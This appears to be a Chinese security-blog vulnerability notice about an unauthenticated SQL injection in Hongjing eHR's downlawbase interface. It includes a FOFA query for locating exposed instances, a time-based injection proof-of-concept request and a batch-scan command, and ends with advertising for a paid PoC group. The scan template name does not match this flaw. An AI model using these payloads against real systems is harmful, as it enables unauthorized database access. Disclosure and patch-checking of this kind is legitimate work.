0x01 免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02 产品介绍
宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户,支持流程,B/S架构。特别适合集团化管理和跨地域使用的产品,融合了最新的互联网技术和先进的人力资源管理理念和实践,更好地支持异地办公和网上流程,加强了人力资源业务的集中管理和协同,支持集团管控、目标管理、领导决策等应用。HJ-eHR主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
0x03 漏洞威胁
宏景eHR downlawbase 接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
0x04 漏洞环境
FOFA:
app="HJSOFT-HCM"
0x05 漏洞复现
POC
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
延时5秒
0x06 批量验证脚本
Nuclei验证脚本已发布
知识星球:冷漠安全
./nuclei -t dh-getNewStaypointDetailQuery-sql.yaml -l dh-getNewStaypointDetailQuery-sql.txt
0x07 修复建议
目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。
http://www.hjsoft.com.cn/#/
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等